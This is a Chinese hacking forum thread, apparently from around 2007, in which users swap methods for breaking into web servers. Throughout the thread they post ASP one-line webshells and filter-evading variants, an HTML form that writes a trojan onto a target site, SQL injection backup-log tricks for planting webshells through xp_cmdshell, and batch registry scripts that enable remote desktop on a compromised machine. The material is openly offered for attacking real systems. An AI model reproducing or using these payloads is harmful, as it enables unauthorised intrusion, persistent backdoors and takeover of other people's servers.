我有时候也是那样的问题的

昨天有个怎么也找不到目录，今天找到可能的答案了，web和sql不在一起。
有时间去看看。
对了，一般怎么利用注入点来爆物理路径？
列目录，实在是很痛苦的事

  都这么厉害一个.

我用LOG、备份一次都没有成功过！！

偶就来说说那个备份进去了的而且也可以看到乱码可就是不能连接的那种情况...
偶一直很多时候都遇到这种情况..一直在查资料..那天在邪八上终于看到了一个牛人的解决突破loop的
一句话
原贴大家可以在论坛内搜索 一句话木马 是个已解决的帖子.下面就是牛人的一句话变形
<%execute request("value")%><%&#39;<% loop <%:%>

<%&#39;<% loop <%:%><%execute request("value")%>
或
<%execute request("value")&#39;<% loop <%:%>
偶用这个备份进去就可以连接了...

感觉一句话中用eval比用execute效果要好.现在很多管理员都会想办法屏蔽execute的执行,但是却忘记了eval......所以个人觉得直接用eval的成功率较高,效果是一样的.
还有,在用dbo权限备份插入一句话时,不是要把一句话转成16进制吗?

3389比较难开。。。。我也拿到一个肉鸡。。里面可以执行CMD
里面也装了一个。。金山杀毒。。。但是我怎么执行命令。。他就是只提示。。3389开启成功。系统20003。。然后就不行了。。。
我有查了一下端口  netstat -an
结果。。。一样都没有开启3389
接着我又重新。。。 来个命令想重新启动机器。。
C:\3389.exe - r
结果提示重新启动机器失败。我就郁闷了。。

2003 可以脚本开3389 .不用重新启动的

引用:

引用第32楼xln28118于2007-05-21 02:27发表的 :
2003 可以脚本开3389 .不用重新启动的

我只知道2000有用脚本开3389的 2003开3389的脚本能发出来吗？

以下是2000下开的：

复制内容到剪贴板

代码:

echo windows registry editor version 5.00>>3389.reg
echo [hkey_local_machine\system\currentcontrolset\control\terminal server]>>3389.reg
echo "fdenytsconnections"=dword:00000000>>3389.reg
echo [hkey_local_machine\system\currentcontrolset\control\terminal server\wds\rdpwd\tds\tcp]>>3389.reg
echo "portnumber"=dword:00000d3d>>3389.reg
echo [hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\rdp-tcp]>>3389.reg
echo "portnumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg

Active Server Pages 错误 &#39;ASP 0116&#39;

丢失脚本关闭分隔符

/Menu/2.asp，行 410429

Script 块缺少脚本关闭标记(%>)。


像这种问题,一般怎么办..

偶是小菜 还不懂 [s:270]

我遇到的问题和LZ一样啊~~~
我用的连接代码如下：
<form action =http://www.xxx.com/xqk.asp method=post>
<textarea name=a cols=120 rows=10 width=45>
set IP=server.createObjct("Adodb.Stream")
IP.Open
IP.Type=2
IP.CharSet="xqk520"
IP.writetext request("xqk")
IP.SaveToFile server.mappath("xqk.asp"),2
IP.Close
set IP=nothing
response.redirect "xqk.asp"
</textarea>
<textarea namp=xqk cols=120 rows=10 width=45>写入木马的内容</textarea><BR><center><br>
<input type=submit value=提交>

<%exectue ruquest("xiangqiankun")%>
<script language=VBScript runat=server>excute request("1")</Script>


----------------------------------------------------------------------------------------
是不是要出现
--------------------------
icrosoft VBScript 运行时错误 错误 &#39;800a000d&#39;

类型不匹配: &#39;execute&#39;

/123.asp，行20
---------------------------------------
才是成功了~~~~

看都看晕了

sql2000的情况下，SA和DBO拿webshell的可能性应该是比较大吧。

但是在sql2005下，老是出现各种问题，比如我就遇到一个SA点，刚开始xp_cmdshell关闭，开启后手工提交又出现如下超时错误，不知道是因为什么原因：


&#39;;backup log AaWeb to disk = &#39;D:\&#39; with init-- 超时时间已到。在操作完成之前超时时间已过或服务器未响应。


如果遇上SQL语句传参数执行的，更是头大。

异常详细信息: System.Data.SqlClient.SqlException: 超时时间已到。在操作完成之前超时时间已过或服务器未响应。

行 95:       command = new SqlCommand(strSql, obj.sqlconn);
行 96:       rs = command.ExecuteReader();
行 97:       if(rs.Read())
行 98:       {


以上2个问题，希望高手出来指点一下。

有的服务器没给备份权限,,,我一次都没成功过

我和你出现了一样的问题~~~~怎么解决的

<%execute request("value")&#39;<% loop <%:%>
Microsoft VBScript 运行时错误 错误 '800a000d'

类型不匹配: 'execute'

/boop.asp，行 20
出现了 的东西
我用的这个备份的，但是怎么连接不上啊

2003 3389

引用:

echo Windows Registry Editor Version 5.00>>c:\3389.reg
echo. >>c:\3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>c:\3389.reg
echo "fDenyTSConnections"=dword:00000000>>c:\3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>c:\3389.reg
echo "PortNumber"=dword:00000D3D>>c:\3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>c:\3389.reg
echo "PortNumber"=dword:00000D3D>>c:\3389.reg
regedit /s c:\3389.reg
del c:\3389.reg

这是2000的代码

引用:

echo Windows Registry Editor Version 5.00 >c:\3389.reg
echo. >>c:\3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>c:\3389.reg
echo "Enabled"="0" >>c:\3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>c:\3389.reg
echo "ShutdownWithoutLogon"="0" >>c:\3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>c:\3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>c:\3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>c:\3389.reg
echo "TSEnabled"=dword:00000001 >>c:\3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>c:\3389.reg
echo "Start"=dword:00000002 >>c:\3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>c:\3389.reg
echo "Start"=dword:00000002 >>c:\3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>c:\3389.reg
echo "Hotkey"="1" >>c:\3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>c:\3389.reg
echo "PortNumber"=dword:00000D3D >>c:\3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>c:\3389.reg
echo "PortNumber"=dword:00000D3D >>c:\3389.reg
regedit /s c:\3389.reg
del c:\3389.reg

楼主怎么就突然提权成功了？

能说说么？

可别好奇，突然就成功了

上面的回答已经很清楚~~你们好好看一边就知道为什么~~看都不看就知道问 为什么~~

判断是不是WEB和数据库机器是同一台，你可以在本地用NC监听，在注入点执行SQL代码